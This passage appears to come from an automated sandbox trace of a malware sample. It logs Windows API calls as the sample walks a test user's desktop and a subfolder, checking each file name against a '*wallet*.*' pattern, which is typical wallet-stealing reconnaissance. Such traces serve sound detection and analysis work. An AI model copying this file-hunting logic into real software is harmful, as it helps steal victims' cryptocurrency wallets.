lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.790] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.790] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.790] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.790] lstrcatW (in: lpString1="\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xd0) returned 0x29a04a0 [0110.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0110.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x64) returned 0x29a11c0 [0110.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x29a11c0, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", lpUsedDefaultChar=0x0) returned 100 [0110.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a1230 [0110.791] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.791] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.791] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ea0 [0110.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ea0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.791] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.791] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.791] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*wallet*.*") returned 0 [0110.791] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970498 | out: hHeap=0x29a0000) returned 1 [0110.791] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1230 | out: hHeap=0x29a0000) returned 1 [0110.791] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c000a40, ftCreationTime.dwHighDateTime=0x1d7a7d8, ftLastAccessTime.dwLowDateTime=0x841601c0, ftLastAccessTime.dwHighDateTime=0x1d7aabb, ftLastWriteTime.dwLowDateTime=0x841601c0, ftLastWriteTime.dwHighDateTime=0x1d7aabb, nFileSizeHigh=0x0, nFileSizeLow=0x1414, dwReserved0=0x0, dwReserved1=0x0, cFileName="fmnAnasf2I.mp4", cAlternateFileName="FMNANA~1.MP4")) returned 1 [0110.791] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.791] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.791] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4" [0110.791] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.791] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.791] lstrcatW (in: lpString1="\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="\\fmnAnasf2I.mp4") returned="\\fmnAnasf2I.mp4" [0110.791] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.791] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", lpUsedDefaultChar=0x0) returned 46 [0110.791] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.791] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.791] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.791] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970b80 [0110.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970b80, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.791] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.791] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b80 | out: hHeap=0x29a0000) returned 1 [0110.792] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*wallet*.*") returned 0 [0110.792] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.792] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.792] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8f0a80, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0xc336cc10, ftLastAccessTime.dwHighDateTime=0x1d7ae1a, ftLastWriteTime.dwLowDateTime=0xc336cc10, ftLastWriteTime.dwHighDateTime=0x1d7ae1a, nFileSizeHigh=0x0, nFileSizeLow=0x187f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="g3fX8Y8-txe9_Es.m4a", cAlternateFileName="G3FX8Y~1.M4A")) returned 1 [0110.792] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.792] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.792] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a" [0110.792] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.792] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.792] lstrcatW (in: lpString1="\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="\\g3fX8Y8-txe9_Es.m4a") returned="\\g3fX8Y8-txe9_Es.m4a" [0110.792] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.792] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea198 [0110.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x38ea198, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.792] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b28 [0110.792] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea198 | out: hHeap=0x29a0000) returned 1 [0110.792] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.792] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970cc0 [0110.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970cc0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.792] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0110.792] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.792] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*wallet*.*") returned 0 [0110.792] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970470 | out: hHeap=0x29a0000) returned 1 [0110.792] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.792] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3aea0, ftCreationTime.dwHighDateTime=0x1d7acc6, ftLastAccessTime.dwLowDateTime=0xe973a3a0, ftLastAccessTime.dwHighDateTime=0x1d7ad14, ftLastWriteTime.dwLowDateTime=0xe973a3a0, ftLastWriteTime.dwHighDateTime=0x1d7ad14, nFileSizeHigh=0x0, nFileSizeLow=0x15d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Izq83dPIx.mp4", cAlternateFileName="IZQ83D~1.MP4")) returned 1 [0110.792] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.792] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.792] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Izq83dPIx.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4" [0110.793] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.793] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.793] lstrcatW (in: lpString1="\\", lpString2="Izq83dPIx.mp4" | out: lpString1="\\Izq83dPIx.mp4") returned="\\Izq83dPIx.mp4" [0110.793] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.793] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", lpUsedDefaultChar=0x0) returned 45 [0110.793] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.793] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.793] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.793] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ca0 [0110.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ca0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.793] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.793] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.793] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*wallet*.*") returned 0 [0110.793] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.793] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.793] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6dde030, ftCreationTime.dwHighDateTime=0x1d7a99c, ftLastAccessTime.dwLowDateTime=0x51405ab0, ftLastAccessTime.dwHighDateTime=0x1d7aeb3, ftLastWriteTime.dwLowDateTime=0x51405ab0, ftLastWriteTime.dwHighDateTime=0x1d7aeb3, nFileSizeHigh=0x0, nFileSizeLow=0x12d9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8k6qCAjWYmc.odt", cAlternateFileName="K8K6QC~1.ODT")) returned 1 [0110.793] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.793] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.793] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt" [0110.793] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.793] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.793] lstrcatW (in: lpString1="\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="\\k8k6qCAjWYmc.odt") returned="\\k8k6qCAjWYmc.odt" [0110.793] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0110.794] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x39700d0, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", lpUsedDefaultChar=0x0) returned 48 [0110.794] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.794] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.794] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.794] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ea0 [0110.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ea0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.794] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.794] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.794] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*wallet*.*") returned 0 [0110.794] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.794] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.794] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KTOu", cAlternateFileName="")) returned 1 [0110.794] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.794] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.794] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.794] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.794] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.794] lstrcatW (in: lpString1="\\", lpString2="KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.794] lstrcmpW (lpString1="KTOu", lpString2=".") returned 1 [0110.794] lstrcmpW (lpString1="KTOu", lpString2="..") returned 1 [0110.794] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.794] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*" [0110.794] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7437a0 [0110.795] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.795] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.795] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\." [0110.795] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.795] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.795] lstrcatW (in: lpString1="\\KTOu\\", lpString2="." | out: lpString1="\\KTOu\\.") returned="\\KTOu\\." [0110.795] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.795] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.795] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.795] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.795] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.." [0110.795] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.795] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.795] lstrcatW (in: lpString1="\\KTOu\\", lpString2=".." | out: lpString1="\\KTOu\\..") returned="\\KTOu\\.." [0110.795] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.795] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.795] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f265de0, ftCreationTime.dwHighDateTime=0x1d7acc3, ftLastAccessTime.dwLowDateTime=0xe01b3e80, ftLastAccessTime.dwHighDateTime=0x1d7af08, ftLastWriteTime.dwLowDateTime=0xe01b3e80, ftLastWriteTime.dwHighDateTime=0x1d7af08, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CEoMqDCJmINqN85E.bmp", cAlternateFileName="3CEOMQ~1.BMP")) returned 1 [0110.795] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.795] lstrcatW (in: 